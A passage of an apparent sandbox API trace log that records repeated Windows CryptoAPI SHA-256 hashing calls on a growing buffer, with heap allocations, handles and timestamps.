phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.957] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0146.957] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e576a0 [0146.957] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e576a0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e576a0, pdwDataLen=0xcea1c) returned 1 [0146.957] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.957] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.957] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.957] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.957] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0146.957] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.958] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56ef0 [0146.958] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e56ef0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e56ef0, pdwDataLen=0xcea1c) returned 1 [0146.958] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.958] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.958] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.958] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.958] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0146.958] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.958] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e579d0 [0146.958] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e579d0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e579d0, pdwDataLen=0xcea1c) returned 1 [0146.958] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.958] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.958] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.959] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.959] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0146.959] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.959] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e576d0 [0146.959] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e576d0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e576d0, pdwDataLen=0xcea1c) returned 1 [0146.959] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.959] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.959] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.960] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.960] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0146.960] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.960] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57a90 [0146.960] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e57a90, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57a90, pdwDataLen=0xcea1c) returned 1 [0146.960] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.960] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.960] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.961] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.961] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0146.961] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.961] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57730 [0146.961] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57730, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57730, pdwDataLen=0xcea1c) returned 1 [0146.961] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.961] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.961] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.961] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.961] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0146.961] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.961] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57310 [0146.962] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e57310, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57310, pdwDataLen=0xcea1c) returned 1 [0146.962] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.962] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.962] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.962] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.962] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0146.962] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.962] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e577c0 [0146.962] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e577c0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e577c0, pdwDataLen=0xcea1c) returned 1 [0146.962] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.962] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.962] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.963] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.963] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0146.963] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.963] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e577f0 [0146.963] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e577f0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e577f0, pdwDataLen=0xcea1c) returned 1 [0146.963] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.963] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.963] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.963] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.964] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0146.964] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.964] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e578b0 [0146.964] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e578b0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e578b0, pdwDataLen=0xcea1c) returned 1 [0146.964] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.964] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.964] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.964] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.964] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0146.964] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.964] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57460 [0146.964] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57460, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57460, pdwDataLen=0xcea1c) returned 1 [0146.964] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.964] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.964] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.965] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.965] CryptHashData (hHash=0x332b7dd0, pbData=0x32e4a600, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0146.965] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.965] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57910 [0146.965] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e57910, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57910, pdwDataLen=0xcea1c) returned 1 [0146.965] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0146.965] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.965] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.966] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.966] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0146.966] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.966] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57490 [0146.966] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57490, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57490, pdwDataLen=0xcea1c) returned 1 [0146.966] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.966] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.966] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.966] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.966] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0146.966] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.966] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57940 [0146.966] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57940, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57940, pdwDataLen=0xcea1c) returned 1 [0146.966] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.967] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.967] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.967] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.967] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0146.967] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.967] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57190 [0146.967] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57190, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57190, pdwDataLen=0xcea1c) returned 1 [0146.967] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.967] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.967] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.968] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.968] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0146.968] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.968] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e572b0 [0146.968] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e572b0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e572b0, pdwDataLen=0xcea1c) returned 1 [0146.968] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.968] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.968] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.969] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.969] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0146.969] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.969] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56f50 [0146.969] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e56f50, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e56f50, pdwDataLen=0xcea1c) returned 1 [0146.969] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.969] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.969] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.969] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.969] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0146.969] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.969] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e570d0 [0146.969] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e570d0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e570d0, pdwDataLen=0xcea1c) returned 1 [0146.970] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.970] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.970] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.970] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.970] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0146.970] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.970] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57970 [0146.970] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e57970, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57970, pdwDataLen=0xcea1c) returned 1 [0146.970] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.970] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.970] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.971] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.971] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0146.971] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.971] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e574c0 [0146.971] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e574c0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e574c0, pdwDataLen=0xcea1c) returned 1 [0146.971] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.971] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.971] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.971] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.972] CryptHashData (hHash=0x332b7820, pbData=0x32e4a600, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0146.972] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.972] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56f80 [0146.972] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x2, pbData=0x32e56f80, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e56f80, pdwDataLen=0xcea1c) returned 1 [0146.972] CryptDestroyHash (hHash=0x332b7820) returned 1 [0146.972] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.972] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.972] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.972] CryptHashData (hHash=0x332b7dd0, pbData=0x32e4a600, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0146.972] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.972] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57130 [0146.972] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e57130, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57130, pdwDataLen=0xcea1c) returned 1 [0146.972] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0146.972] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.972] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.973] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.973] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0146.973] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.973] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57640 [0146.973] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57640, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57640, pdwDataLen=0xcea1c) returned 1 [0146.973] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.973] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.973] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.974] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.974] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0146.974] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.974] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57280 [0146.974] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57280, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57280, pdwDataLen=0xcea1c) returned 1 [0146.974] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.974] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.974] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.974] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.974] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0146.974] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.974] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57220 [0146.974] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57220, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57220, pdwDataLen=0xcea1c) returned 1 [0146.974] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.975] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.975] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.975] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.975] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0146.975] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.975] RtlAllocateHeap (HeapHandle=0x2150000, 